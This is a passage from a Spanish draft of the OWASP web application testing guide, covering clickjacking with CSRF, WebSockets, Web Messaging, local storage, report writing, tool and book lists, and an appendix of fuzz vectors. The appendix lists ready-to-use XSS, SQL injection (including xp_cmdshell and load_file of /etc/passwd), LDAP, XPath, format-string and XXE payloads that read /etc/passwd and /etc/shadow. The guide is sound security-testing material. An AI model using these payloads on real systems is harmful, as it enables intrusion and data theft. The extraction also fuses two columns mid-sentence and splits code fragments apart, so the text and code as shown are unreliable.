Una vez que hemos descubierto que el sitio que estamos probando es value=”’ . $_RE UEST[‘amount’] . ‘” />
vulnerable a los ataques de clickjacking, podemos proceder con el
desarrollo de una "prueba de concepto" para demostrar la vulnerabilidad. <input type=”hidden” name=”account”
Es importante señalar que, como se mencionó anteriormente, estos value=”’ . $_RE UEST[‘account’] . ‘” />
ataques se pueden utilizar en combinación con otras formas de ataques
(por ejemplo ataques CSRF) y podrían conducir a vencer los tokens anti- <input type=”hidden” name=”antiCsrf”
CSRF. En este sentido, podemos imaginar que, por ejemplo, el sitio de value=”’ . $csrfToken . ‘” />
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
317
Guia de pruebas 4.0 "Borrador"
<input type=”submit” class=”button” evadir la protección anti-CSRF y obligar a la víctima a hacer una
value=”Transfer Money” /> transferencia de dinero sin su consentimiento.
</label>
{ <html>
Como se puede ver, el código está protegido de ataques CSRF de dos <style type=”text/css”><!--
maneras: una con un token aleatorio generado en el segundo paso y la
otra, aceptando solamente el método de variable pasada vía POST. En esta *{
situación, un atacante podría forjar un ataque CSRF + Clickjacking para
margin:0;
} • Clickjacking
body {
background:#6699CC;
left:275px; • Gustav Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson:
Herramientas
permitiendo situaciones del tipo Top 10 2013-A8-Cross-Site Request • Use herramientas para desarrolladores de Google Chrome para acceder a la
Forgery (CSRF) Red WebSocket de comunicación.
Confidencialidad e integridad • Use OWASP Zed Ataque Proxy (ZAP) 's WebSocket tab.
Autorización
Desinfección de entrada
4. Autenticación.
Al igual que con todos los datos procedentes de fuentes no confiables, los datos
deben ser adecuadamente desinfectados y codificados. Preste atención a los
• Los WebSockets no manejan la autenticación, por lo que deben llevarse a
problemas de Top 10 2013-A1-inyección y Top 10 2013-A3-Cross-Site Scripting
cabo pruebas normales de autenticación de Caja Negra. Consulte las secciones
(XSS).
de pruebas de autenticación de esta guía.
5. Autorización.
Cómo probar
• Los WebSockets no manejan la autorización, por lo que deben llevarse a cabo
Prueba de Caja Negra pruebas normales de habilitación de Caja Negra. Consulte las secciones de pruebas
de autorización de esta guía.
1. Identificar que la aplicación utiliza WebSockets.
• Inspeccione el código fuente del lado del cliente para los WS: // o WSS: //
esquema URI. 6. Desinfección de entrada.
• Use el OWASP Zed Attack Proxy (ZAP)’s WebSocket tab para volver a
reproducir y fuzz WebSocket para solicitud y respuestas. Consulte las
secciones de Prueba de validación de datos de esta guía.
Referencias
Libros Blancos
Enviar mensaje:
Resumen iframe1.contentWindow.postMessage(“Hello
world”,”http://www.example.com”);
Web Messaging (también conocido como Cross Document Messaging)
permite a las aplicaciones que se ejecutan en diferentes dominios
comunicarse de una manera segura. Antes de la introducción de la web de
mensajería, la comunicación de diferentes orígenes (entre iframes, Recibir mensaje:
pestañas y ventanas) fue restringida por la política del mismo origen y
puesta en vigor por el navegador; sin embargo, los desarrolladores
utilizan varios cortes con el fin de llevar a cabo estas tareas, la mayoría de
ellas principalmente inseguras. window.addEventListener(“message”, handler, true);
function handler(event) {
Esta restricción en el navegador está colocada para evitar que un sitio if(event.origin === ‘chat.example.com’) {
web malicioso pueda leer datos confidenciales de otros iframes, tabs, etc,
sin embargo, hay algunos casos donde dos legítimos sitios web de /* process message (event.data) */
confianza necesitan intercambiar datos entre sí.
} else {
Desde una perspectiva de seguridad, se debe comprobar si el código está La comprobación manual debe llevarse a cabo y el código JavaScript debe
filtrando y procesando mensajes solamente desde dominios de confianza. ser analizado para averiguar cómo se implementa Web Messaging. En
Normalmente, la mejor manera de lograr esto es usar una lista blanca. particular, debemos estar interesados en cómo el sitio web limita los
También dentro del dominio de envío, queremos asegurarnos de que el mensajes provenientes de dominio de confianza, y cómo los datos se
dominio de recepción se está indicando explícitamente y no '*' como el manejan incluso para los dominios de confianza. A continuación se
segundo argumento de postMessage (), ya que esta práctica podría presentan algunos ejemplos:
introducir problemas de seguridad y podría conducir al caso de un
cambio de dirección, o si el origen cambia por otros medios, el sitio web
estaría enviando datos a hosts desconocidos y, por lo tanto, filtrando
datos confidenciales a servidores maliciosos. Ejemplo de código vulnerable :
www.owasp.org
eval()
chat.owasp.org
o se inserta en el DOM a través de
forums.owasp.org
innerHTML
...
function callback(e) {
Prueba de Caja Gris
Resumen
Ejemplo de validación de entradas: La falta de controles de seguridad Almacenamiento local, también conocido como Web Storage o Offline
conducen a Cross-Site Scripting (XSS) Storage, es un mecanismo para almacenar los datos como pares
clave/valor atados a un dominio y forzados por la política del mismo
window.addEventListener(“message”, callback, true); origen (SOP). Hay dos objetos: localStorage que es persistente y está
destinado a sobrevivir los reinicios del navegador/sistema; y
sessionStorage que es temporal y sólo existe hasta que se cierre la
ventana o pestaña.
function callback(e) {
Referencias
sessionStorage
Recursos OWASP
La principal diferencia de localStorage es que se puede acceder a los
• OWASP HTML5 Security Cheat Sheet: owasp.org
datos almacenados en este objeto sólo hasta que la pestaña / ventana se
cierra, lo que lo hace un candidato perfecto para los datos que no
necesitan persistir entre sesiones. Ya que comparte la mayoría de las
Libros Blancos propiedades y los métodos getItem / setItem, la prueba manual debe
llevarse a cabo para buscar estos métodos e identificar en qué partes del
• Web Messaging Specification: whatwg.org código se accede al almacenamiento.
Cómo probar También podemos inspeccionar estos objetos a partir de las herramientas
de desarrollo de nuestro navegador.
Prueba de Caja Negra
Para el uso de Google Chrome, haga clic en menu -> Tools -> Developer var resource = location.hash.substring(1);
Tools. A continuación, en Recursos, verá "Almacenamiento local" y
"almacenamiento Web '.
localStorage.setItem(“item”,resource);
item = localStorage.getItem(“item”);
document.getElementById(“div1”).innerHTML=item;
<body onload=”action()”>
<div id=”div1”></div>
</body>
Referencias
Herramientas
Recursos OWASP
• Firebug: getfirebug.com
• OWASP HTML5 Security Cheat Sheet: owasp.org
Cómo Reportar
5 La realización de la parte técnica de la evaluación es sólo la mitad del proceso global de evaluación.
El producto final es la producción de un informe bien escrito e informativo. Un informe debe ser
fácil de entender y debe poner de relieve todos los riesgos encontrados durante la fase de
evaluación. El informe debe hacer un llamamiento tanto a la dirección ejecutiva como al personal
técnico.
2. Parámetros de prueba
1. Resumen Ejecutivo
2.2 Alcance del proyecto: En esta sección se describe el alcance acordado.
El resumen ejecutivo compendia los resultados generales de la evaluación
y ofrece a los administradores de negocios y propietarios de sistemas una
vista de alto nivel de las vulnerabilidades descubiertas. El lenguaje
utilizado debe ser más adecuado para las personas que no están al tanto 2.3 Planificación del proyecto: Esta sección muestra cuando la prueba
de la tecnología y debe incluir gráficos o diagramas que muestren el nivel inició y terminó.
de riesgo. Tenga en cuenta que es probable que los ejecutivos sólo tengan
tiempo para leer este resumen y quieran dos preguntas contestadas en un
lenguaje sencillo: 1) ¿Qué pasa? 2) ¿Cómo lo arreglo? Usted tiene una
página para responder a estas preguntas. 2.4 Objetivos: Esta sección muestra el número de aplicaciones o sistemas
específicos.
Recopilación de Información
OTG-INFO-003 Revisión de los Meta archivos del Servidor Web para la fuga de información
OTG-INFO-005 Revisión de los Comentarios de la Página Web y metadatos para la fuga de información
Pruebas de Autenticación
Pruebas de Autorización
Prueba de oráculo
Prueba de PostgreSQL
Pruebas de Acceso MS
Manejo de errores
Criptografía
OTG-CRYPST-001 Pruebas para cifrados SSL/TSL débiles, protección de la capa de transporte insuficiente
OTG-BUSLOGIC-005 Prueba de Límites de Número de veces que una función se puede utilizar
• Pantera usa una versión mejorada de SpikeProxy para proveer un motor más
poderoso de análisis para aplicaciones web. El objetivo principal de Pantera es
combinar capacidades automatizadas con pruebas manuales completas para
Esta sección se utiliza a menudo para describir las herramientas conseguir los mejores resultados en pruebas de penetración.
comerciales y de código abierto que fueron utilizadas para realizar la
evaluación. Cuando scripts personalizados o códigos son utilizados
durante la evaluación, estos deben darse a conocer en esta sección o se
deben señalar como un archivo adjunto. Los clientes aprecian cuando se OWASP Mantra - Security Framework
incluye la metodología utilizada por los consultores. Esto les da una idea
de la minuciosidad de la evaluación y de cuáles áreas fueron incluidas. • Mantra es un framework de pruebas de seguridad de aplicaciones web construido
sobre un navegador. Es compatible con Windows, Linux (32 y 64 bit) y Macintosh.
Además, puede trabajar con otros programas como ZAP usando funciones
administrativas de proxy incorporado que hace que sea mucho más conveniente.
References Industry standard vulnerability severity and risk rankings (CVSS) [1]: Mantra está disponible en nueve idiomas: árabe, chino - simplificado, chino -
first.org tradicional, inglés, francés, portugués, ruso, español y turco.
Herramientas de Pruebas de Caja Negra de código abierto • SPIKE está diseñado para analizar nuevos protocolos de red en busca de una
saturación de búfer o debilidades similares. Requiere un sólido conocimiento de C
Pruebas Generales para utilizarlo y sólo está disponible para la plataforma Linux.
• El Zed Attack Proxy (ZAP) es una herramienta de pruebas de penetración • Burp Proxy es un servidor proxy interceptor para pruebas de seguridad de
integrada, fácil de usar para encontrar vulnerabilidades en aplicaciones web. Está aplicaciones web, que permite interceptar y modificar todo el tráfico HTTP(S) que
diseñada para ser utilizada por personas con amplia experiencia en seguridad y, pasa en ambas direcciones; puede trabajar con certificados SSL personalizados y
como tal, es ideal para desarrolladores y evaluadores funcionales que son nuevos en clientes no proxy conscientes.
el uso de pruebas de penetración.
OWASP CAL9000
w3af - w3af.org
Firefox LiveHTTPHeaders - addons.mozilla.org
• w3af es un framework referencial de ataques y auditorías de aplicaciones web. El
• Visualiza encabezados HTTP de una página mientras navega. objetivo del proyecto es encontrar y explotar las vulnerabilidades de la aplicaciones
web.
• DOM Evaluador es una herramienta de desarrollador que se usa para HTTP Request Maker - chrome.google.com
inspeccionar, navegar y editar un Documento de Modelo de Objeto (Document
Object Model (DOM)). • Request Maker es una herramienta de pruebas de penetración. Con esta
aplicación puede capturar fácilmente solicitudes realizadas por páginas web, alterar
los encabezados URL e información POST y, por supuesto, realizar nevas
solicitudes.
Firefox Firebug - getfirebug.com
Wikto - sensepost.com
Prueba de Oracle
Prueba de AJAX
• TNS Listener tool (Perl: jammed.com
• OWASP Sprajax Project: owasp.org
• Toad for Oracle: quest.com
• “Un depurador basado en Windows que se usa para analizar las vulnerabilidades
• Bsqlbf-v2: Un script Perl que permite la extracción de datos de de saturación del búfer”
• Un framework de distorción que puede usarse para explorar vulnerabilidades y • SoapUI (Web Service security testing): soapui.org
realizar pruebas de larga duración de Fuerza Bruta Binaria (Brute Force Binary
Tester (BFB)) : • Netsparker: mavitunasecurity.com
Metasploit: metasploit.com
• PMD: pmd.sourceforge.net
• Stach & Liu’s Google Hacking Diggity Project: bishopfox.com • Microsoft’s FxCop: msdn.microsoft.com
• Boon: cs.berkeley.edu
Herramientas de código fuente • Uno de los primeros marcos de prueba web; adolece de usar el nativo
JDK proporcionando transporte HTTP que puede ser un poco limitante
• Un marco de pruebas basado en la web Ruby que proporciona una para las pruebas de seguridad.
interfaz en Internet Explorer.
• Watij: watij.com
• Windows solamente.
• Solex: solex.sourceforge.net
• Muy robusto y configurable y se utiliza como motor para un número de
otras herramientas de prueba.
• Selenium: seleniumhq.org
• Un meta-marco basado en Java que utiliza htmlunit o selenium como
motor de prueba.
• Rational PurifyPlus: 01.ibm.com • Security Considerations in the System Development Life Cycle
Analisis Binario • The Security of Applications: Not All Are Created Equal:
• Veracode: veracode.com
• wget: gnu.org
• curl: curl.haxx.se • Use Cases: Just the FAQs and Answers: ibm.com
Guía de pruebas OWASP Apéndice B: Flaws, by Chris Wysopal, Lucas Nelson, Dino Dai Zovi, Elfriede Dustin,
published by Addison: Wesley, ISBN 0321304861 (2006)
Lecturas sugeridas
• Improving Web Application Security: Threats and Countermeasures: • The Ethical Hack: A Framework for Business Value Penetration
Hoglund, published by Addison-Wesley Pub Co, ISBN 0201786958 (2004): • Secure Coding: Principles and Practices, by Mark Graff and Kenneth
exploitingsoftware.com
R. Van Wyk, published by O’Reilly, ISBN 0596002424 (2003):
securecoding.org
• The Hacker’s Handbook: The Strategy behind Breaking into and
(2004): dwheeler.com
Security Flaws, 2nd Edition - published by Dafydd Stuttard, Marcus Pinto, ISBN • Software Security: Building Security In, by Gary McGraw, published
9781118026472 (2011)
by Addison-Wesley Professional, ISBN 0321356705 (2006)
• + Online version available at: books.google.com • The Unified Modeling Language User Guide, by Grady Booch, James
Rumbaugh, Ivar Jacobson, Ivar published by Addison-Wesley Professional, ISBN
0-201-57168-4 (1998)
• Mastering the Requirements Process, by Suzanne Robertson and Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast,
by Paco Hope, Ben Walther, published by O’Reilly, ISBN 0596514832 (2008)
James Robertson, published by Addison-Wesley Professional, ISBN 0201360462
• CERT Secure Coding: cert.org • OWASP Vulnerable Web Applications Directory Project: owasp.org
• Exploit and Vulnerability Databases: buildsecurityin.us-cert.gov • Damn Vulnerable Web App: blog.dewhurstsecurity.com
• OASIS Web Application Security (WAS) TC: oasis-open.org • + Hacme Shipping: mcafee.com
• The Open Web Application Application Security Project (OWASP: • Mutillidae: irongeek.com
• Pentestmonkey - Pen Testing Cheat Sheets: pentestmonkey.net • Vicnum: vicnum.sourceforge.net and owasp.org
• Secure Coding Guidelines for the .NET Framework 4.5: • WebGoat: owasp.org
• System Administration, Networking, and Security Institute (SANS): Guía de pruebas de OWASP Apéndice C: Vectores Fuzz
sans.org Los siguientes son vectores fuzzing que se pueden utilizar con
WebScarab, JBroFuzz, WSFuzzer, ZAP u otro fuzzer. Fuzzing es el enfoque
• Technical INFO - Making Sense of Security: technicalinfo.net del "fregadero de la cocina" en inglés: "kitchen sink" para probar la
respuesta de una aplicación al parámetro manipulación. En general, se
• Web Application Security Consortium: webappsec.org buscan condiciones de error que se generan en una aplicación como
resultado de fuzzing. Esta es la parte sencilla de la fase de
• Web Application Security Scanner List : projects.webappsec.org descubrimiento. Una vez que el error ha sido descubierto, se requiere
habilidad para identificar y explotar una vulnerabilidad potencial.
• Web Security - Articles: acunetix.com
Categorías fuzz
Videos
“><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>
http://www.example.com/8302fa3b alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26qu
ot;)>
http://www.example.com/00000000 “>
... >”
http://www.example.com/11000fff ‘’;!--”<XSS>=&{()}
<IMG SRC=javascript:alert(‘XSS’)>
le&<WBR>#114;t('XS<WBR>;S&
#39;)>
La realización de pruebas de Cross Site Scripting (XSS) mediante el envío
de los siguientes vectores fuzz: <IMGSRC=ja&<WBR>#0000118as
&<WBR>#0000099ri&<WBR>#0000112t�
http://www.example.com/>”><script>alert(“XSS”)</script>&
000058
http://www.example.com/’’;!--”<XSS>=&{()}
&<WBR>#0000097le&<WBR>#0000114t�
000040&<WBR>#0000039XS&<WBR>#0000083�
39)>
Esta es una forma de ocultamiento por reemplazo. En esta categoría, el
número total de solicitudes depende del número de vectores fuzz
especificados.
<IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
Tenga en cuenta que el intento de cargar un archivo de definición de este tipo
dentro de una aplicación fuzzer puede potencialmente causar que la aplicación se
bloquee
Desbordamiento de búfer y de error de formato de cadena
%s%p%x%d
Buffer Overflows (BFO) (desbordamiento de búfer)
.1024d
Un desbordamiento de memoria o un ataque de corrupción de memoria
es una condición de programación que permite el desbordamiento de %.2049d
datos válidos, más allá de su límite de almacenamiento preubicado en la
memoria. %p%p%p%p
%x%x%x%x
%99999999999s
Tenga en cuenta que el intento de cargar un archivo de definición de este
tipo dentro de una aplicación fuzzer puede potencialmente causar que la %08x
aplicación se bloquee.
%%20d
A x5
%%20n
A x 17
%%20x
A x 33
%%20s
A x 65
%s%s%s%s%s%s%s%s%s%s
A x 129
%p%p%p%p%p%p%p%p%p%p
A x 257
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%
A x 513 a%C%S%08x%%
A x 1024 %s x 129
A x 2049
-1 ‘ OR 1=1--
0 OR 1=1
0x100 ‘ OR ‘1’=’1
0x1000 ; OR ‘1’=’1’
0x3fffffff %22+or+isnull%281%2F0%29+%2F*
0x7ffffffe %27+OR+%277659%27%3D%277659
0x7fffffff %22+or+isnull%281%2F0%29+%2F*
0x80000000 %27+--+
0xfffffffe ‘ or 1=1--
0xffffffff “ or 1=1--
0x10000 ‘ or 1=1 /*
0x100000 or 1=1--
Este ataque puede afectar a la capa de base de datos de una aplicación y “ or “a”=”a
normalmente está presente cuando la entrada del usuario no está filtrada
para declaraciones SQL. ‘) or (‘a’=’a
Admin’ OR ‘
‘ having 1=1--
• Inyección S L Pasiva (Passive SQL Injection)
‘ group by userid having 1=1--
• Inyección S L Activa ( Active S L Injection)
‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects
WHERE name = tablename’)--
Las declaraciones de inyección SQL activas pueden tener un efecto ‘ or 1 in (select @@version)--
perjudicial en la base de datos subyacente si se ejecutan con éxito.
‘ union all select @@version--
‘ OR ‘unusual’ = ‘unusual’
Inyección SQL Pasiva (SQP)
‘ OR ‘something’ = ‘some’+’thing’
‘||(elt(-3+5,bin(15),ord(10),hex(char(45))))
‘ OR ‘text’ = N’text’
||6
‘ OR ‘something’ like ‘some%’
‘||’6
‘ OR 2 > 1
‘ OR ‘whatever’ in (‘whatever’) INSERT INTO mysql.user (user, host, password) VALUES (‘name’, ‘localhost’,
PASSWORD(‘pass123’))
‘ OR 2 BETWEEN 1 and 3
GRANT CONNECT TO name; GRANT RESOURCE TO name;
‘ or username like char(37);
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) +
‘ union select * from users where login = char(114,111,111,116); char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70)
Password:*/=1--
‘; EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’ para detalles de la inyección LDAP: Prueba de inyección LDAP
‘/**/OR/**/1/**/=/**/1 !
‘ or 1/* (
+or+isnull%281%2F0%29+%2F* )
%27+OR+%277659%27%3D%277659 %28
%22+or+isnull%281%2F0%29+%2F* %29
%27+--+&password= &
*|
‘ and 1 in (select var from temp)--
%2A%7C
‘ union select 1,load_file(‘/etc/passwd’),1,1,1;
*(|(mail=*))
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
%2A%28%7C%28mail%3D%2A%29%29
‘ and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
Inyección SQL Activa (SQI)
*()|%26’
‘; exec master..xp_cmdshell ‘ping 10.10.1.2’--
admin*
CREATE USER name IDENTIFIED BY ‘pass123’
admin*)((|userPassword=*)
CREATE USER name IDENTIFIED BY pass123 TEMPORARY
TABLESPACE temp DEFAULT TABLESPACE users; *)(uid=*))(|(uid=*
/
En el espacio de seguridad de la aplicación, y debido a la gran cantidad de
// esquemas de codificación disponibles, la codificación de caracteres tiene
un mal uso popular. Está siendo utilizada para la codificación de
//* secuencias de inyección maliciosas en una manera que las ofusca. Esto
puede conducir a la desviación del ingreso de filtros de validación, o a
*/* sacar ventaja de las formas particulares en que los navegadores muestran
el texto codificado.
@*
count(/child::node())
Codificación de entrada - Evasión de filtro
x’+or+name()=’username’+or+’x’=’y
Las aplicaciones web suelen emplear diferentes tipos de mecanismos de
filtro de entrada para limitar las entradas que pueden ser enviadas por el
usuario. Si estos filtros de entrada no se aplican lo suficientemente bien,
Inyección XML es posible deslizar uno o dos caracteres a través de estos filtros. Por
ejemplo, a / puede ser representado como 2F (hex) en ASCII, mientras
Los detalles de la Inyección XML están aquí: Prueba de inyección XML que el mismo carácter (/) se codifica como C0 AF en Unicode (secuencia 2
byte). Por lo tanto, es importante que el filtrado de control de entrada
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
tenga en cuenta el esquema de codificación utilizado. Si se encuentra que
el filtro está detectando sólo inyecciones codificadas UTF-8, se puede
<?xml version=”1.0” encoding=”ISO-8859-
emplear un esquema de codificación diferente para evitar este filtro.
1”?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘gotcha’);<![CDATA[<
]]>/SCRIPT<![CDATA[>]]></foo> Codificación de salida - Servidor y Navegador de Consenso
<?xml version=”1.0” encoding=”ISO-8859-1”?><foo><![CDATA[‘ or 1=1 or Los navegadores web deben estar conscientes del esquema de
‘’=’]]></foof> codificación utilizado para mostrar coherentemente una página web.
Idealmente, esta información debe ser proporcionada al navegador en el
<?xml version=”1.0” encoding=”ISO-8859-1”?><!DOCTYPE foo [<!ELEMENT encabezado HTTP ("Content-Type"), como se muestra a continuación:
foo ANY><!ENTITY xxe SYSTEM “file://c:/boot.ini”>]><foo>&xee;</foo>
Content-Type: text/html; charset=UTF-8
<?xml version=”1.0” encoding=”ISO-8859-1”?><!DOCTYPE foo [<!ELEMENT
foo ANY><!ENTITY xxe SYSTEM “file:///etc/passwd”>]><foo>&xee;</foo>
<?xml version=”1.0” encoding=”ISO-8859-1”?><!DOCTYPE foo [<!ELEMENT o a través de la etiqueta HTML META (“META HTTP-E UIV”), como se
foo ANY><!ENTITY xxe SYSTEM “file:///etc/shadow”>]><foo>&xee;</foo> muestra a continuación:
Codificación básica
Considere un filtro básico de validación de entrada que protege contra la Aunque cada esquema de codificación no puede trabajar cada vez, un
inyección de carácter de comilla simple. En este caso, la inyección que poco de ensayo y error, junto con manipulaciones inteligentes, sin duda
está a continuación evitaría fácilmente este filtro: revelarán la brecha en un filtro de validación de entrada que haya sido
débilmente construido.
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Codificación Multi-byte
Referencias
• http://en.wikipedia.org/wiki/Encode_(semiotics)
• http://ha.ckers.org/xss.html
• http://www.cert.org/tech_tips/malicious_code_mitigation.html
• http://www.w3schools.com/HTML/html_entities.asp
• http://www.iss.net/security_center/advice/Intrusions/
2000639/default.htm
• http://searchsecurity.techtarget.com/expert/Knowledgebase-
Answer/0,289625,sid14_gci1212217_tax299989,00.html
• http://www.joelonsoftware.com/articles/Unicode.html